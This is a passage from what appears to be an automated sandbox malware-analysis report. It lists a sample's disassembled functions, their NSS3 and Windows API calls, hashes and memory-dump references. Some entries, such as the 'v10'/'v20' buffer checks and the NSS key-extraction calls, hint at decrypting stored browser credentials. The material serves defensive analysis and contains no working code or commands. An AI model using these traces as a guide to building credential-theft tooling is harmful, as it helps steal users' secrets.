Part of subcall function 6CFE0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CFE08B4

PORT_Alloc_Util.NSS3(?), ref: 6CFDA4EC

Part of subcall function 6CFE0BE0: malloc.MOZGLUE(6CFD8D2D,?,00000000,?), ref: 6CFE0BF8
Part of subcall function 6CFE0BE0: TlsGetValue.KERNEL32(6CFD8D2D,?,00000000,?), ref: 6CFE0C15

memcpy.VCRUNTIME140(-00000006,?,?), ref: 6CFDA527
memcmp.VCRUNTIME140(00000006,?,?), ref: 6CFDA56D
memcmp.VCRUNTIME140(00000006,00000006,00000004), ref: 6CFDA583
PR_SetError.NSS3(FFFFE00A,00000000), ref: 6CFDA596
free.MOZGLUE(?), ref: 6CFDA5A4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CFDA5B6

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Error$Utilmemcmp$Alloc_FindTag_Valuefreemallocmemcpy
String ID:
API String ID: 3906949479-0
Opcode ID: ead00b1673181627d03ae6b776d309487eb7625dafe086cd5abc94b34a079ed3
Instruction ID: aabe125f07dcad02055584d0887e24530faaa2e20ba959933a4d276767c64163
Opcode Fuzzy Hash: ead00b1673181627d03ae6b776d309487eb7625dafe086cd5abc94b34a079ed3
Instruction Fuzzy Hash: B3411836A053429FEB00CF59CC40B9ABBB1BF44308F1AC468D8595B742EB31F919C7A5

Function 0040A560 Relevance: 10.7, APIs: 4, Strings: 3, Instructions: 155memoryCOMMON

Download Yara Rule

APIs

memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

memcmp.MSVCRT(?,v10,00000003), ref: 0040A5D2
memset.MSVCRT ref: 0040A60B
LocalAlloc.KERNEL32(00000040,?), ref: 0040A664

Strings

@, xrefs: 0040A614
v20, xrefs: 0040A571
v10, xrefs: 0040A5C6

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: memcmp$AllocLocallstrcpymemset
String ID: @$v10$v20
API String ID: 631489823-278772428
Opcode ID: b9d0d0c46109c75398614dfce7f7a8c302aa0478d7eca67942b56a81e0520e08
Instruction ID: deead5598e30f73acd49a71965db0b9c26184f2a73657d717c04d8255e3e8135
Opcode Fuzzy Hash: b9d0d0c46109c75398614dfce7f7a8c302aa0478d7eca67942b56a81e0520e08
Instruction Fuzzy Hash: 7C518E30610208EFCB14EFA5DD95FDD7775AF40304F008029F90A6F291DB78AA55CB5A

Function 6CFCAC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6CFCAB3E,?,?,?), ref: 6CFCAC35

Part of subcall function 6CFACEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6CFACF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6CFCAB3E,?,?,?), ref: 6CFCAC55

Part of subcall function 6CFE10C0: TlsGetValue.KERNEL32(?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE10F3
Part of subcall function 6CFE10C0: EnterCriticalSection.KERNEL32(?,?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE110C
Part of subcall function 6CFE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE1141
Part of subcall function 6CFE10C0: PR_Unlock.NSS3(?,?,?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE1182
Part of subcall function 6CFE10C0: TlsGetValue.KERNEL32(?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6CFCAB3E,?,?), ref: 6CFCAC70

Part of subcall function 6CFAE300: TlsGetValue.KERNEL32 ref: 6CFAE33C
Part of subcall function 6CFAE300: EnterCriticalSection.KERNEL32(?), ref: 6CFAE350
Part of subcall function 6CFAE300: PR_Unlock.NSS3(?), ref: 6CFAE5BC
Part of subcall function 6CFAE300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6CFAE5CA
Part of subcall function 6CFAE300: TlsGetValue.KERNEL32 ref: 6CFAE5F2
Part of subcall function 6CFAE300: EnterCriticalSection.KERNEL32(?), ref: 6CFAE606
Part of subcall function 6CFAE300: PORT_Alloc_Util.NSS3(?), ref: 6CFAE613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6CFCAC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6CFCAB3E), ref: 6CFCACD7
PORT_Alloc_Util.NSS3(?), ref: 6CFCAD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6CFCAD2B

Part of subcall function 6CFAF360: TlsGetValue.KERNEL32(00000000,?,6CFCA904,?), ref: 6CFAF38B
Part of subcall function 6CFAF360: EnterCriticalSection.KERNEL32(?,?,?,6CFCA904,?), ref: 6CFAF3A0
Part of subcall function 6CFAF360: PR_Unlock.NSS3(?,?,?,?,6CFCA904,?), ref: 6CFAF3D3

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID:
API String ID: 2926855110-0
Opcode ID: 12c468cdcb3856824cd33433578021ee7195dc1007f5d59471ef123e7cc64aec
Instruction ID: 6282054787b6243ca691b149755b645b4e8a7a7b04c53ad4c6a06d8ce9ad4372
Opcode Fuzzy Hash: 12c468cdcb3856824cd33433578021ee7195dc1007f5d59471ef123e7cc64aec
Instruction Fuzzy Hash: 25311CB2F006065FEB04DF65CC409AF77B6EF8471CB198129E9259B740EB31ED1587A2

Function 6CFA8C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6CFA8C7C

Part of subcall function 6D049DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6D090A27), ref: 6D049DC6
Part of subcall function 6D049DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6D090A27), ref: 6D049DD1
Part of subcall function 6D049DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D049DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CFA8CB0
TlsGetValue.KERNEL32 ref: 6CFA8CD1
EnterCriticalSection.KERNEL32(?), ref: 6CFA8CE5
PR_Unlock.NSS3(?), ref: 6CFA8D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6CFA8D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CFA8D93

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: 01285b41d7488729f2d82d65d210f8cd2628220de45ca0c20b33912b07224a34
Instruction ID: c9f51d0c917bda8f10d6650359df6e59a873f5d8f266d7b6cae4a4f9c15839b0
Opcode Fuzzy Hash: 01285b41d7488729f2d82d65d210f8cd2628220de45ca0c20b33912b07224a34
Instruction Fuzzy Hash: C0312472901641EFEB009FA8DC44B9AF7B4BF44318F24013AEE1967B90D7B0A965CBD1

Function 6CFC8500 Relevance: 10.6, APIs: 7, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6CFC95DC,00000000,00000000,00000000,?,6CFC95DC,00000000,00000000,?,6CFA7F4A,00000000,?,00000000,00000000), ref: 6CFC8517

Part of subcall function 6CFDBE30: SECOID_FindOID_Util.NSS3(6CF9311B,00000000,?,6CF9311B,?), ref: 6CFDBE44

PORT_NewArena_Util.NSS3(00000800,00000000,00000000,?,6CFA7F4A,00000000,?,00000000,00000000), ref: 6CFC8585
PORT_ArenaAlloc_Util.NSS3(00000000,00000034,?,00000000,00000000,?,6CFA7F4A,00000000,?,00000000,00000000), ref: 6CFC859A
SEC_ASN1DecodeItem_Util.NSS3(00000000,00000000,6D0AD8C4,6CFC95D0,?,?,?,00000000,00000000,?,6CFA7F4A,00000000,?,00000000,00000000), ref: 6CFC85CC
SECOID_GetAlgorithmTag_Util.NSS3(-0000001C,?,?,?,?,?,?,?,00000000,00000000,?,6CFA7F4A,00000000,?,00000000,00000000), ref: 6CFC85E1
PORT_FreeArena_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,00000000,00000000,?,6CFA7F4A,00000000,?), ref: 6CFC85F4

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Util$AlgorithmArena_Tag_$Alloc_ArenaDecodeFindFreeItem_
String ID:
API String ID: 738345241-0
Opcode ID: f3ac3b34e4c7630acb3fbfe4732382eb4ddfd124f38779c6a26f8d4ac4dc1407
Instruction ID: 43bd3feaa636483954b2bc977c6cf343479c226f95b5b898d9dde0c9e99bcaaf
Opcode Fuzzy Hash: f3ac3b34e4c7630acb3fbfe4732382eb4ddfd124f38779c6a26f8d4ac4dc1407
Instruction Fuzzy Hash: 65318CA2F0120257F7108528CC40BAB3239ABA139CF1A0677F915D7FC2FB14DD5492A7

Function 6CF94590 Relevance: 10.6, APIs: 7, Instructions: 100memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CF945B5

Part of subcall function 6CFE0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CF887ED,00000800,6CF7EF74,00000000), ref: 6CFE1000
Part of subcall function 6CFE0FF0: PR_NewLock.NSS3(?,00000800,6CF7EF74,00000000), ref: 6CFE1016
Part of subcall function 6CFE0FF0: PL_InitArenaPool.NSS3(00000000,security,6CF887ED,00000008,?,00000800,6CF7EF74,00000000), ref: 6CFE102B

PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6CF945C9

Part of subcall function 6CFE10C0: TlsGetValue.KERNEL32(?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE10F3
Part of subcall function 6CFE10C0: EnterCriticalSection.KERNEL32(?,?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE110C
Part of subcall function 6CFE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE1141
Part of subcall function 6CFE10C0: PR_Unlock.NSS3(?,?,?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE1182
Part of subcall function 6CFE10C0: TlsGetValue.KERNEL32(?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE119C

memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6CF945E6
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CF945F8

Part of subcall function 6CFDFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CFD8D2D,?,00000000,?), ref: 6CFDFB85
Part of subcall function 6CFDFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CFDFBB1

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CF94647
SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6D0AA0F4,?), ref: 6CF9468C
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CF946A1

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCopyCriticalDecodeEnterErrorFreeInitLockPoolQuickSectionUnlockcallocmemcpymemset
String ID:
API String ID: 1594507116-0
Opcode ID: c9b75ad4203b23773f20e277485ab41ff6ba3aaa0a9caaf2f876a0b67fc02d85
Instruction ID: 96dfc241dc6e7e71d68ab40a4a74974e6dce2a48ce0622eb5de4e35a25271e80
Opcode Fuzzy Hash: c9b75ad4203b23773f20e277485ab41ff6ba3aaa0a9caaf2f876a0b67fc02d85
Instruction Fuzzy Hash: 8331D4B1A003149BFF104E68DC51B6B7AB8EB55358F144038EA14DF785EB75C80487A6

Function 6CFD4470 Relevance: 10.6, APIs: 7, Instructions: 82COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,6CF97296,00000000), ref: 6CFD4487
EnterCriticalSection.KERNEL32(?,?,?,6CF97296,00000000), ref: 6CFD44A0
PR_Unlock.NSS3(?,?,?,?,6CF97296,00000000), ref: 6CFD44BB
SECMOD_DestroyModule.NSS3(?,?,?,?,6CF97296,00000000), ref: 6CFD44DA
DeleteCriticalSection.KERNEL32(?,?,?,?,6CF97296,00000000), ref: 6CFD4530
free.MOZGLUE(?,?,?,?,?,6CF97296,00000000), ref: 6CFD453C
PORT_FreeArena_Util.NSS3 ref: 6CFD454F

Part of subcall function 6CFBCAA0: PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD,6CF9B1EE,D958E836,?,6CFD51C5), ref: 6CFBCAFA
Part of subcall function 6CFBCAA0: PR_UnloadLibrary.NSS3(?,6CFD51C5), ref: 6CFBCB09

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: CriticalSection$Arena_DeleteDestroyEnterFreeLibraryModuleSecureUnloadUnlockUtilValuefree
String ID:
API String ID: 3590924995-0
Opcode ID: 6c9b5fa639b781d135f3f8c311b21375901f5f6d3fd56af4a9e1698ed291e8d3
Instruction ID: b8359f00a406223247ace9ee02dc3c249e943dde925f06fc7ecdca15ccebb91c
Opcode Fuzzy Hash: 6c9b5fa639b781d135f3f8c311b21375901f5f6d3fd56af4a9e1698ed291e8d3
Instruction Fuzzy Hash: 62314DB5904A019FDB10AF39C084669BBF4FF09319F064669D89997B00E731F895CFD1

Function 6CFECEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6CFECD93,?), ref: 6CFECEEE

Part of subcall function 6CFE14C0: TlsGetValue.KERNEL32 ref: 6CFE14E0
Part of subcall function 6CFE14C0: EnterCriticalSection.KERNEL32 ref: 6CFE14F5
Part of subcall function 6CFE14C0: PR_Unlock.NSS3 ref: 6CFE150D

PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CFECD93,?), ref: 6CFECEFC

Part of subcall function 6CFE10C0: TlsGetValue.KERNEL32(?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE10F3
Part of subcall function 6CFE10C0: EnterCriticalSection.KERNEL32(?,?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE110C
Part of subcall function 6CFE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE1141
Part of subcall function 6CFE10C0: PR_Unlock.NSS3(?,?,?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE1182
Part of subcall function 6CFE10C0: TlsGetValue.KERNEL32(?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE119C

SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CFECD93,?), ref: 6CFECF0B

Part of subcall function 6CFE0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CFE08B4

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CFECD93,?), ref: 6CFECF1D

Part of subcall function 6CFDFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CFD8D2D,?,00000000,?), ref: 6CFDFB85
Part of subcall function 6CFDFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CFDFBB1

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CFECD93,?), ref: 6CFECF47
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CFECD93,?), ref: 6CFECF67
SECITEM_CopyItem_Util.NSS3(?,00000000,6CFECD93,?,?,?,?,?,?,?,?,?,?,?,6CFECD93,?), ref: 6CFECF78

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
String ID:
API String ID: 4291907967-0
Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction ID: 2089a400cef7c71beeb20fe60a8d8101a658a34e90b8270952ae155b10fb5644
Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction Fuzzy Hash: 6911D5B1A003417BEB04AB666C41B6B79EC9F4C24DF044439FD09D7741FB70DA0886B2

Function 6CF98C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CF98C1B
EnterCriticalSection.KERNEL32 ref: 6CF98C34
PL_ArenaAllocate.NSS3 ref: 6CF98C65
PR_Unlock.NSS3 ref: 6CF98C9C
PR_Unlock.NSS3 ref: 6CF98CB6

Part of subcall function 6D02DD70: TlsGetValue.KERNEL32 ref: 6D02DD8C
Part of subcall function 6D02DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D02DDB4

Strings

KRAM, xrefs: 6CF98C8F

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: 54ee7f79fe5d42c7bc8d60ceb47a46059bb68c003eac3e450afc15e7beaf02bd
Instruction ID: 8dfbe0614f116e55511f22df02b924cefc9bcfd2b19c83a7d975c4f7c292e056
Opcode Fuzzy Hash: 54ee7f79fe5d42c7bc8d60ceb47a46059bb68c003eac3e450afc15e7beaf02bd
Instruction Fuzzy Hash: B9214FB1905A018FEB00AF78C484659FBF4FF45314F16896ED988CB711EB35E895CB92

Function 6D02A540 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6D02A390: PR_SetError.NSS3(FFFFE005,00000000), ref: 6D02A415

PK11_ExtractKeyValue.NSS3(00000000), ref: 6D02A5AC
memcpy.VCRUNTIME140(?,?,?), ref: 6D02A5BF
PK11_FreeSymKey.NSS3(00000000), ref: 6D02A5C8

Part of subcall function 6CFCADC0: TlsGetValue.KERNEL32(?,6CFACDBB,?,6CFAD079,00000000,00000001), ref: 6CFCAE10
Part of subcall function 6CFCADC0: EnterCriticalSection.KERNEL32(?,?,6CFACDBB,?,6CFAD079,00000000,00000001), ref: 6CFCAE24
Part of subcall function 6CFCADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CFAD079,00000000,00000001), ref: 6CFCAE5A
Part of subcall function 6CFCADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CFACDBB,?,6CFAD079,00000000,00000001), ref: 6CFCAE6F
Part of subcall function 6CFCADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CFACDBB,?,6CFAD079,00000000,00000001), ref: 6CFCAE7F
Part of subcall function 6CFCADC0: TlsGetValue.KERNEL32(?,6CFACDBB,?,6CFAD079,00000000,00000001), ref: 6CFCAEB1
Part of subcall function 6CFCADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CFACDBB,?,6CFAD079,00000000,00000001), ref: 6CFCAEC9

PK11_FreeSymKey.NSS3(00000000), ref: 6D02A5D9
PR_SetError.NSS3(FFFFD04C,00000000), ref: 6D02A5E8

Strings

*@, xrefs: 6D02A589

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: K11_Value$CriticalEnterErrorFreeSection$ExtractUnlockfreememcpymemset
String ID: *@
API String ID: 2660593509-1483644743
Opcode ID: 87637c17ebe43ad10436c8375423d77cfaa188f5a5e29a1159b599617f602d11
Instruction ID: 60f916fb35e3ba4bb94de3e822e9aac59b1703e8adf7cf35128fe08cef591806
Opcode Fuzzy Hash: 87637c17ebe43ad10436c8375423d77cfaa188f5a5e29a1159b599617f602d11
Instruction Fuzzy Hash: 4B2105B1D043159BD7009F299C00BAFBBF4AF89718F024229FC4863340EB70A6498BD3

Function 6D092C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6D092CA0
PR_ExitMonitor.NSS3 ref: 6D092CBE
calloc.MOZGLUE(00000001,00000014), ref: 6D092CD1
strdup.MOZGLUE(?), ref: 6D092CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6D092D27

Strings

Loaded library %s (static lib), xrefs: 6D092D22

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

